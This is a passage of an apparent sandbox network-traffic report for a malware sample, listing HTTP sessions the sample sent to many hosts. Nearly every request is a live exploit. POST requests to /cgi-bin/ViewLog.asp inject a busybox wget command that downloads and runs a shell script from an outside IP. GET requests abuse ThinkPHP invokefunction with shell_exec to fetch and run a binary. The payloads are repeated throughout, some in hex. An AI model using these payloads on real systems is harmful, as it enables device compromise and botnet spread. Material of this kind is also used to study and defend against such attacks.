                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:53.310745001 CET20681OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:09.180774927 CET20705OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1011192.168.2.234003831.136.104.2488080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:38.362690926 CET19641OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:39.360553026 CET19762OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:41.344289064 CET20006OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:45.375817060 CET20423OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:53.310760975 CET20682OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:09.180763960 CET20705OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1012192.168.2.236099094.120.219.1408080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:38.373703003 CET19642OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1013192.168.2.234171288.99.118.19680
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:38.400872946 CET19643OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:38.707478046 CET19734INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:20:38 GMT
                                                              Server: Apache/2.4.56 (Debian)
                                                              Content-Length: 226
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1014192.168.2.234532488.122.69.1980
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:38.406413078 CET19644OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1015192.168.2.234795494.122.123.1858080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:38.407120943 CET19645OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1016192.168.2.233855895.86.77.1588080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:38.418962955 CET19645OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1017192.168.2.234048894.110.4.2018080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:38.678462982 CET19708OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:39.648590088 CET19765OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1018192.168.2.2339014112.126.233.18780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:40.039586067 CET19861OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:40.351059914 CET19879INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:16:40 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1019192.168.2.234505285.209.139.2378080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:40.130208015 CET19875OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:40.465718031 CET19885INHTTP/1.0 400 Bad Request
                                                              Server: squid/3.1.23
                                                              Mime-Version: 1.0
                                                              Date: Mon, 13 Nov 2023 20:57:05 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 3169
                                                              X-Squid-Error: ERR_INVALID_URL 0
                                                              Connection: close
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66
                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              102192.168.2.235596495.209.156.1788080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:24.173361063 CET3064OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1020192.168.2.2341088112.223.67.3780
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:40.365632057 CET19880OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:42.048214912 CET20112OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:44.031939030 CET20338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:48.191462994 CET20663OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:56.126379967 CET20687OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:21:11.996313095 CET20708OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              1021192.168.2.235115431.201.210.38080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:40.451127052 CET19882OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
